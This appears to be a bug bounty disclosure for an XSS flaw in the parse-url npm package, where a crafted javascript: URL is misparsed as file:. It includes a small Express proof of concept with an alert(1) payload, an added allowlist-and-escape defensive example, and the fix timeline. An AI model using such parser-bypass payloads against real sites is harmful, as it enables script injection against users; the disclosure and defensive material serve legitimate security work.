xss via improper parsing of javascript: url in ionicabizau/parse-url

Valid

Reported on

Jul 18th 2022


Description

A URL like javascript://e[xamp]le.com%0aalert(1) is incorrectly recognised as having the file: protocol. This has nothing to do with escaping, since the characters that are commonly escaped (&, >, <, " and ') are not present in the URL.

Proof of Concept

const parseUrl = require("parse-url");
const express = require('express');
const app = express();

// parse-url reports this URL as file:, so the protocol check below lets it through
const parsed = parseUrl("javascript://e[xamp]le.com%0aalert(1)");
console.log(parsed);

app.get('/', (req, res) => {
    // denylist check on the parsed protocol; bypassed because of the misparse
    if (parsed.protocol !== "javascript") {
        res.send("<a href='" + parsed.href + "'>CLICK ME!</a>");
    } else {
        res.status(400).send("rejected");
    }
});

app.listen(9999);

Impact

XSS
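The proof of concept passes because it denylists one protocol on the output of a parser that misclassified the input. The following is an added example, not part of the report or of parse-url, showing the defensive counterpart: parse with the WHATWG URL parser built into Node.js, allowlist the schemes that may be rendered, and escape the value before it is placed in an HTML attribute. The function names (safeHref, escapeAttr, renderLink, classify) and the sample inputs are constructed for this example.

```javascript
// Allowlist of schemes that may ever appear in a rendered link.
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// Return a normalised absolute URL string, or null if the input is relative,
// unparsable, or uses a scheme that is not on the allowlist.
function safeHref(input) {
  let url;
  try {
    url = new URL(input); // throws on relative or malformed input
  } catch (e) {
    return null;
  }
  // url.protocol is lowercased and whitespace-trimmed by the parser,
  // so "JavaScript:" and "  javascript:" are covered as well.
  return ALLOWED_PROTOCOLS.has(url.protocol) ? url.href : null;
}

// Escape the five characters that matter inside a quoted HTML attribute.
function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Build the anchor, or return null when the URL must not be rendered at all.
function renderLink(input) {
  const href = safeHref(input);
  if (href === null) return null;
  return `<a href="${escapeAttr(href)}">CLICK ME!</a>`;
}

// Constructed inputs: the report's payload plus variants of the same idea,
// and one ordinary URL that should be accepted.
const SAMPLES = [
  'javascript://e[xamp]le.com%0aalert(1)',
  'JavaScript:alert(1)',
  '  javascript:alert(1)',
  'data:text/html,<b>x</b>',
  '//example.com/',
  'https://example.com/path?q=1',
];

// Run every sample through renderLink and return the decisions.
function classify(inputs) {
  return inputs.map((input) => ({ input, link: renderLink(input) }));
}

for (const r of classify(SAMPLES)) {
  console.log(r.link === null ? 'rejected' : 'accepted', JSON.stringify(r.input));
}
```

The allowlist is the important part: rejecting only the string "javascript" leaves every other dangerous or unexpected scheme, and every parser quirk, in play, whereas naming the two schemes the page is prepared to link to makes a misparse fail closed. Escaping the attribute is a separate layer that does not, on its own, stop a javascript: link from executing.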

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. 10 months ago
We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back 10 months ago
We have sent a follow up to the ionicabizau/parse-url team. We will try again in 7 days. 10 months ago
Ionică Bizău (Johnny B.) validated this vulnerability 10 months ago

Hi! Thank you for this finding!

haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the ionicabizau/parse-url team. We will try again in 7 days. 10 months ago
Ionică Bizău (Johnny B.) marked this as fixed in 8.0.0 with commit b88c81 10 months ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty
This vulnerability will not receive a CVE